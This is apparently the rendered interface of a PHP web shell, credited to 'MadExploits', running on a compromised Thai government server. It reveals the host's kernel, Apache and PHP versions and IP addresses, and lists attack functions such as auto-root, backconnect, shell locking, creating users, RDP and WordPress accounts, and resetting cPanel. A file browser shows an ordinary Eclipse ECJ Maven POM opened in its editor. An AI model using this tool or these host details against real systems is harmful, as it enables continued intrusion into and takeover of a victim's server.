Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
maven2 /
poms /
[ HOME SHELL ]
Name
Size
Permission
Action
JPP-bcel.pom
269
B
-rw-r--r--
JPP-ecj.pom
2.13
KB
-rw-r--r--
JPP-jakarta-commons-dbcp.pom
6.55
KB
-rw-r--r--
JPP-mysql-connector-java.pom
1.23
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : JPP-ecj.pom
<?xml version="1.0" encoding="UTF-8"?> <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd"> <!-- Originally downloaded here: http://download.eclipse.org/eclipse/downloads/drops4/R-4.5.2-201602121500/#JDTCORE --> <modelVersion>4.0.0</modelVersion> <groupId>org.eclipse.jdt.core.compiler</groupId> <artifactId>ecj</artifactId> <version>4.5.2</version> <packaging>jar</packaging> <name>Eclipse ECJ</name> <description>Eclipse JDT Core Batch Compiler</description> <url>http://www.eclipse.org/jdt/</url> <properties> <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding> <project.reporting.outputEncoding>UTF-8</project.reporting.outputEncoding> <maven.compiler.source>1.7</maven.compiler.source> <maven.compiler.target>1.7</maven.compiler.target> </properties> <licenses> <license> <name>Eclipse Public License v1.0</name> <url>http://www.eclipse.org/org/documents/epl-v10.php</url> <distribution>repo</distribution> </license> </licenses> <scm> <url>http://dev.eclipse.org/viewcvs/index.cgi/org.eclipse.jdt.core/</url> <connection>:pserver:anonymous@dev.eclipse.org:/cvsroot/eclipse</connection> </scm> <developers> <!-- I didn't develop ECJ, but the Central Sync Requirements mandate a developer in the POM: https://docs.sonatype.org/display/Repository/Central+Sync+Requirements --> <developer> <name>Ralph Schaer</name> <email>ralphschaer@gmail.com</email> </developer> </developers> <dependencies> <dependency> <groupId>org.apache.ant</groupId> <artifactId>ant</artifactId> <version>1.9.4</version> <optional>true</optional> </dependency> </dependencies> <build> <plugins> <plugin> <groupId>org.apache.maven.plugins</groupId> <artifactId>maven-javadoc-plugin</artifactId> <version>2.10.3</version> <configuration> <additionalparam>-Xdoclint:none</additionalparam> </configuration> </plugin> </plugins> </build> </project>
Close